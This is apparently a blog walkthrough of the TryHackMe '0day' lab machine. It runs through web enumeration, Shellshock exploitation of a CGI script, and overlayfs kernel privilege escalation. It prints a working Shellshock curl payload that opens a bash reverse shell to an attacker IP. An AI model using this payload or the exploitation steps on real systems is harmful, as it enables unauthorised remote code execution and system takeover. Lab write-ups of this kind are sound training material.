0day Tryhackme Walkthrough

Akshay Shinde
4 min readOct 24, 2020

Exploit Ubuntu, like a Turtle in a Hurricane

0day is an intermediate boot2root machine on tryhackme and I found this machine to be very interesting to exploit.

This machine covers a very important vulnerability and one find it very easy to exploit.

Lets start off by scanning and enumerating the ports using Nmap.

Nmap scan results

Ok so we have got port 80 to be opened and we can further proceed with the web enumeration using dirb and nikto.

Lets see what we have got from the dirb using common.txt as the default wordlist.

Dirb scan results
Dirb scan results

We have got a lot of directories to go through.I got something very strange while going through backup directory.

I mean I got access to the ssh private key ,that’s huge but later when I tried getting into the machine using ssh ,it was a foul play : (

Just a foul play :(

After some time the nikto scan results got completed and found this vulnerability in /cgi-bin/test.cgi.

Nikto scan showing the website vulnerable to shellshock

So if you guys haven’t heard of what Shellshock is and how it works.Here’s a short explanation from my side.

Shellshock is a security bug which causes the bash to execute commands from environment variables unintentionally. If it is exploited it allows the attacker to remotely issue commands on the server, also called as Remote Code Execution.

Since the environmental variables are not sanitized properly by Bash before being executed,the attacker can pretty much takeover the entire system using Shellshock vuln.

It was discovered by Stephane Chazelas and was assigned with a CVE identifier CVE-2014–6271.We will move forward by exploiting it manually rather than using metasploit.

Exploiting Shellshock manually:

Shellshock Example

This is the basic method to see if the server is vulnerable to shellshock or not.Instead we will use our machine IP and path to vulnerability and see if we get anything from the server.

Ok so it is vulnerable and we can exploit it by injecting a reverse shell and listening for incoming connections.

curl –H ‘User-Agent: () { :;}; echo; echo; /bin/bash –i >& /dev/tcp/10.9.81.62/1234 0>&1 ’ bash –s : ‘’ http://10.10.226.13/cgi-bin/test.cgi

This is the payload that we will be using to get reverse connection.

Reverse connection

We got user.txt and just left with the privilege escalation.

user.txt

I searched around for a bit and did not get anything from it. So I fired up linpeas.sh and found there’s gcc compiler present in the machine.

Ok so lets check the version of Linux using uname and see if we can get any Kernel exploits.

Kernel version exploits

We got it, overlayfs exploit :)

Uploading the exploit
Compiling the exploit

As you can see the gcc is not able to fetch cc1 and that’s the reason it is not getting compiled.Maybe its causing because of the PATH variable.

I did lookout for the hint on this room: “This is a very old operating system you’ve got here, isn’t it?..”

We have to change the PATH variable to get inline. Follow me…

export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin

Compiled successfully

Cool now just run the binary and enjoy root :))

root.txt

There’s other method that I found out from the Tryhackme discord channel that we can compile the exploit in our machine and then transfer it to the victim’s machine. It works perfectly 😉

Compiling in our machine
Transfering and running the binary

Hope to see you guys soon 😄 Happy Hacking 💻

--

--

Akshay Shinde

Security Research @AppKnox | CEH(P) | CRTP | eCPPTv2 | RASTALABS